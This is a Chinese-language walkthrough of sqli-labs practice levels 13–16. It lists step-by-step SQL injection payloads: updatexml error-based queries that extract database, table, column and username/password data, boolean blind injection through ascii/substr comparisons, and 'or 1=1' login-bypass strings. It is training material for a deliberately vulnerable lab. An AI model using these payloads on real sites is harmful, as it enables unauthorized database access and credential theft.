Bootstrap

sqli-labs靶场13-16关(每日4关)持续更新!!!

Less-13

首先上来判断闭合方式是什么,我们输入1' ,看看页面回显情况

1后面有个括号,那我们输入 1') #  看一下页面回显

发现页面不报错了,但是没有回显内容,我们联想一下前几道题,页面回显不改变,会用到报错注入和盲注两种方式 ,要是盲注的话,布尔盲注和时间盲注这俩的页面回显会有变动,所以我们这道题选择报错注入,报错注入的方式还是用updatexml。

//updatexml格式   

updatexml(xml_doument,Xpath_String,new_value);

我们使用:updatexml(1,concat(0x7e,(...),0x7e),1); 

1.获取数据库

') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

2.获取表

')and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #

 

3.获取列

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) #

我们会发现出来这条语句,怎么没有username和password呀,我们忽略了一点,updatexml报错有报错字符大小限制,不能完全显示出来,所以我们就不用group了,我们用limit,一个个试一试

//usename

') and updatexml(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='users' limit 4,1),0x7e),1) #

 

//password

') and updatexml(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='users' limit 5,1),0x7e),1) #

 

4.获取字段

也是用limit,让他们一个个输出

') and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1),0x7e),1) #

成功!!!

Less-14

发现和上一关一样,说明还是报错注入

那我们就判断闭合方式即可,其余步骤和上一关做法一样

说明闭合方式是双引号

直接显示最后一步,输出字段,也是用limit一次一次输出

"and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1),0x7e),1) #

 

Less-15

判断注入点,闭合方式,输入万能密码 'or 1=1 #   发现页面只显示登陆成功,其余又不显示,看题干,那就是盲注中的布尔盲注了。

1.获取数据库长度(需要自己去尝试),登陆成功说明正确

' or length(database()) = 8 #

 

1.获取数据库,因为我们并不知道用户名是什么,所以用or

//secutity

' or ascii(substr((select database()),1,1)) = 115 #

...

2.表名

//长度

' or (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 # 

//emails

' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101 #

...

3.列名

//长度

' or (select length(column_name) from information_schema.columns where table_name='emails' limit 0,1) = 2 #

' or (select length(column_name) from information_schema.columns where table_name='emails' limit 1,1) = 8 #

//id

' or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) = 105 #

...

//email_id

' or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)) = 101 #

...

4.字段

//长度

'or (select length(email_id) from emails limit 0,1) = 16 #

//[email protected]

# 第一个字段第一个字母是 D

' or ascii(substr((select email_id from emails limit 0,1),1,1)) = 68 #

 Less-16

和第15关一样,就是闭合方式有区别

本关的闭合方式是   ")

先用万能密码登录,测试闭合方式

") or 1=1 # 

登陆成功!

其余步骤和第15关一样 

;